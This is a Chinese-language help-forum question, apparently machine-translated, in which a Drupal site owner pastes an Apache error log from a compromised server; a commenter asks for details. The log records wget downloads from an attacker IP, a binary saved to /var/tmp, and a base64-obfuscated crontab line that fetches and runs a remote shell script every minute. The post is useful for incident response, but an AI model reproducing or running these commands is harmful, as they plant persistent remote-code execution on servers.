【发布时间】:2018-11-15 08:46:11
【问题描述】:
apache 服务器错误日志:
--2018-11-14 22:13:39-- http://164.132.159.56/drupal/zps.sh 连接到 164.132.159.56:80... 已连接。 HTTP 请求已发送,等待响应... 200 OK 长度:589 [文本/x-sh] 保存到:'STDOUT'
0K 100% 101M=0s
2018-11-14 22:13:40 (101 MB/s) - 写入标准输出 [589/589]
rm: 无法删除 '/var/tmp/yum-ec2-user-_j9uM3': 不允许操作 rm:拒绝删除'.'或“..”目录:跳过“/var/tmp/.” rm:拒绝删除'.'或“..”目录:跳过“/var/tmp/..” --2018-11-14 22:13:40-- http://164.132.159.56/drupal/2/olo 连接到 164.132.159.56:80... 已连接。 HTTP 请求已发送,等待响应... 200 OK 长度:33880(33K) 保存到:'/var/tmp/lew'
0K .......... .......... .......... ... 100% 286K=0.1s
2018-11-14 22:13:40 (286 KB/s) - '/var/tmp/lew' 已保存 [33880/33880]
% Total % Received % Xferd 平均速度 时间 时间 时间 当前 下载上传总花费剩余速度 ^M 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M100 33880 100 33880 0 0 96119 0 --:--: -- --:--:-- --:--:-- 96250 e:没有这样的文件或目录 e:没有这样的文件或目录 e: 没有这样的文件或目录
e: 没有这样的文件或目录 e:没有这样的文件或目录 e:没有这样的文件或目录 e:没有这样的文件或目录 e:没有这样的文件或目录 e:没有这样的文件或目录 sh:第 1 行:22417 完成 echo '* * * * * echo -n "d2dldCAtTyAtIGh0dHA6Ly8xNjQuMTMyLjE1OS41Ni9kcnVwYWwvei5zaHxzaA==" | base64 -d |sh > /dev/null' 22418 被杀 | crontab - e:没有这样的文件或目录 e:没有这样的文件或目录 e:没有这样的文件或目录 e: 没有这样的文件或目录
请告诉解决方法。
【问题讨论】:
-
被黑太糟糕了...很抱歉听到您的问题。也就是说,如果没有更多上下文,我不确定是否有人能够帮助您。前端hack的结果是什么?您正在运行 Drupal 6、7 或 8 - 哪个颠覆?您已经了解了哪些关于黑客的知识?另外,请尽量记住该线程的未来用途:目标是帮助您以及遇到类似问题的其他人。目前看来,我们将无法帮助您或遇到像您这样不幸情况的任何其他人。